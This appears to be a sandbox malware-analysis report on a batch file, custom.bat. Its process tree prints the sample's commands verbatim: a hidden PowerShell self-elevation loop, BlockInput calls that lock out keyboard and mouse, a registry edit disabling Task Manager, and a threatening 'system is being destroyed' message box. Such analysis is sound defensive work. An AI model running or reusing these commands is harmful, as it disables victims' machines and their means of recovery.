14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f

Analysis

max time kernel
3s
max time network
22s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
08-09-2024 06:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

89f798a5159a32183eb30196d01f1332
SHA1

a9d25c229a0c10acdc45afdb75d67a8b986cd4f0
SHA256

14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f
SHA512

add8be87d110b65818a30ef77fc3e9e708b810d9e982693525a9ce11d6e1c7f1fda8d3486b80c21a928902705c113a98a069f88fd2274fec152b6aa13f7df1f0
SSDEEP

96:oDmjh7cQGQI9cQITKlQI9uO3DPVqdCgNlWroMu7eQ/Gx6fGfZUX9fQ1ZXkNQI9Iu:oCN7hsTPsdCgVM0emG8bx

Score

8^/10

evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2892	powershell.exe
3464	powershell.exe
1220	powershell.exe
4160	powershell.exe
1628	powershell.exe
2996	powershell.exe
2448	powershell.exe
3328	powershell.exe
2452	powershell.exe
4940	powershell.exe
3208	powershell.exe
5016	powershell.exe
5876	powershell.exe
5144	powershell.exe
4556	powershell.exe
5144	powershell.exe
5660	powershell.exe
1252	powershell.exe
1460	powershell.exe
3224	powershell.exe
5652	powershell.exe
5968	powershell.exe
5388	powershell.exe
5600	powershell.exe
892	powershell.exe
2436	powershell.exe
832	powershell.exe
1008	powershell.exe
2268	powershell.exe
4592	powershell.exe
5016	powershell.exe
2832	powershell.exe
4796	powershell.exe
2032	powershell.exe
400	powershell.exe
5736	powershell.exe
1524	powershell.exe
3336	powershell.exe
5496	powershell.exe
968	powershell.exe
5080	powershell.exe
1036	powershell.exe
2732	powershell.exe
5424	powershell.exe
4876	powershell.exe
4392	powershell.exe
856	powershell.exe
5536	powershell.exe
6040	powershell.exe
540	powershell.exe
2740	powershell.exe
2364	powershell.exe
4012	powershell.exe
6088	powershell.exe
5256	powershell.exe
2528	powershell.exe
4940	powershell.exe
4236	powershell.exe
3196	powershell.exe
1312	powershell.exe
5536	powershell.exe
5556	powershell.exe
5188	powershell.exe
5804	powershell.exe

Disables Task Manager via registry modification
evasion

Kills process with taskkill 12 IoCs

evasion

pid	Process
3172	taskkill.exe
1992	taskkill.exe
1256	taskkill.exe
2856	taskkill.exe
1524	taskkill.exe
4564	taskkill.exe
2044	taskkill.exe
1860	taskkill.exe
3912	taskkill.exe
4824	taskkill.exe
1556	taskkill.exe
4880	taskkill.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2032	powershell.exe
2032	powershell.exe
2996	powershell.exe
2996	powershell.exe
4596	powershell.exe
4596	powershell.exe
1524	powershell.exe
1524	powershell.exe
2892	powershell.exe
2892	powershell.exe
2476	powershell.exe
2476	powershell.exe
4940	powershell.exe
4940	powershell.exe
3464	powershell.exe
3464	powershell.exe
4392	powershell.exe
968	powershell.exe
4392	powershell.exe
968	powershell.exe
2452	powershell.exe
2452	powershell.exe
4932	powershell.exe
4932	powershell.exe
468	powershell.exe
468	powershell.exe
892	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 4188 wrote to memory of 888	4188	cmd.exe	79
PID 4188 wrote to memory of 888	4188	cmd.exe	79
PID 888 wrote to memory of 2032	888	cmd.exe	81
PID 888 wrote to memory of 2032	888	cmd.exe	81
PID 2032 wrote to memory of 2660	2032	powershell.exe	82
PID 2032 wrote to memory of 2660	2032	powershell.exe	82
PID 2660 wrote to memory of 2996	2660	cmd.exe	84
PID 2660 wrote to memory of 2996	2660	cmd.exe	84
PID 888 wrote to memory of 4596	888	cmd.exe	85
PID 888 wrote to memory of 4596	888	cmd.exe	85
PID 2996 wrote to memory of 1976	2996	powershell.exe	86
PID 2996 wrote to memory of 1976	2996	powershell.exe	86
PID 2660 wrote to memory of 1524	2660	cmd.exe	88
PID 2660 wrote to memory of 1524	2660	cmd.exe	88
PID 4596 wrote to memory of 2796	4596	powershell.exe	89
PID 4596 wrote to memory of 2796	4596	powershell.exe	89
PID 1976 wrote to memory of 2892	1976	cmd.exe	117
PID 1976 wrote to memory of 2892	1976	cmd.exe	117
PID 1524 wrote to memory of 1372	1524	powershell.exe	91
PID 1524 wrote to memory of 1372	1524	powershell.exe	91
PID 2892 wrote to memory of 2872	2892	powershell.exe	92
PID 2892 wrote to memory of 2872	2892	powershell.exe	92
PID 1976 wrote to memory of 2476	1976	cmd.exe	94
PID 1976 wrote to memory of 2476	1976	cmd.exe	94
PID 888 wrote to memory of 4940	888	cmd.exe	188
PID 888 wrote to memory of 4940	888	cmd.exe	188
PID 2476 wrote to memory of 864	2476	powershell.exe	96
PID 2476 wrote to memory of 864	2476	powershell.exe	96
PID 2872 wrote to memory of 3464	2872	cmd.exe	124
PID 2872 wrote to memory of 3464	2872	cmd.exe	124
PID 4940 wrote to memory of 4172	4940	powershell.exe	98
PID 4940 wrote to memory of 4172	4940	powershell.exe	98
PID 4172 wrote to memory of 3416	4172	csc.exe	99
PID 4172 wrote to memory of 3416	4172	csc.exe	99
PID 3464 wrote to memory of 3020	3464	powershell.exe	100
PID 3464 wrote to memory of 3020	3464	powershell.exe	100
PID 888 wrote to memory of 2856	888	cmd.exe	220
PID 888 wrote to memory of 2856	888	cmd.exe	220
PID 2872 wrote to memory of 4392	2872	cmd.exe	103
PID 2872 wrote to memory of 4392	2872	cmd.exe	103
PID 888 wrote to memory of 968	888	cmd.exe	104
PID 888 wrote to memory of 968	888	cmd.exe	104
PID 3020 wrote to memory of 2452	3020	cmd.exe	105
PID 3020 wrote to memory of 2452	3020	cmd.exe	105
PID 4392 wrote to memory of 4692	4392	powershell.exe	106
PID 4392 wrote to memory of 4692	4392	powershell.exe	106
PID 968 wrote to memory of 3640	968	powershell.exe	107
PID 968 wrote to memory of 3640	968	powershell.exe	107
PID 3640 wrote to memory of 4820	3640	csc.exe	108
PID 3640 wrote to memory of 4820	3640	csc.exe	108
PID 888 wrote to memory of 4932	888	cmd.exe	190
PID 888 wrote to memory of 4932	888	cmd.exe	190
PID 2452 wrote to memory of 1864	2452	powershell.exe	110
PID 2452 wrote to memory of 1864	2452	powershell.exe	110
PID 3020 wrote to memory of 468	3020	cmd.exe	161
PID 3020 wrote to memory of 468	3020	cmd.exe	161
PID 1864 wrote to memory of 892	1864	cmd.exe	113
PID 1864 wrote to memory of 892	1864	cmd.exe	113

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4188
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2996
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3464
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2452
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        12⤵
        Suspicious use of WriteProcessMemory
        
        PID:1864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:892
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        14⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        16⤵
        
        PID:4020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1252
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        18⤵
        
        PID:3364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2436
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        20⤵
        
        PID:4592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2832
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        22⤵
        
        PID:3032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        24⤵
        
        PID:3480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3208
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        26⤵
        
        PID:3428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        28⤵
        
        PID:3088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4796
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        30⤵
        
        PID:3192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1220
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        32⤵
        
        PID:4328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3328
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        34⤵
        
        PID:3696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2268
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        36⤵
        
        PID:5320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5652
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        38⤵
        
        PID:6024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5388
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        40⤵
        
        PID:5572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5876
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        42⤵
        
        PID:5844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        44⤵
        
        PID:5976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5144
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        46⤵
        
        PID:5268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5736
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        48⤵
        
        PID:756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        50⤵
        
        PID:712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2528
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cyp1gzal\cyp1gzal.cmdline"
        48⤵
        
        PID:5156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        45⤵
        
        PID:4212
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3vdpknfi\3vdpknfi.cmdline"
        46⤵
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        43⤵
        
        PID:1172
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t3ipeaan\t3ipeaan.cmdline"
        44⤵
        
        PID:5276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5496
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\duam1w30\duam1w30.cmdline"
        42⤵
        
        PID:5140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5188
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zbpyz2yv\zbpyz2yv.cmdline"
        40⤵
        
        PID:5696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        37⤵
        
        PID:6128
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3wgctukr\3wgctukr.cmdline"
        38⤵
        
        PID:5648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5424
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\atc43e5e\atc43e5e.cmdline"
        36⤵
        
        PID:5688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        33⤵
        
        PID:1960
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0pggokxg\0pggokxg.cmdline"
        34⤵
        
        PID:5184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2364
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uje2jbri\uje2jbri.cmdline"
        32⤵
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        29⤵
        
        PID:1000
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f31wwu1w\f31wwu1w.cmdline"
        30⤵
        
        PID:3828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        29⤵
        
        PID:2072
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4isxxcxa\4isxxcxa.cmdline"
        30⤵
        
        PID:2328
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF06.tmp" "c:\Users\Admin\AppData\Local\Temp\4isxxcxa\CSCEC5F2A8876F1402FA014A61828AA84D1.TMP"
        31⤵
        
        PID:1900
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        29⤵
        
        PID:5164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        29⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
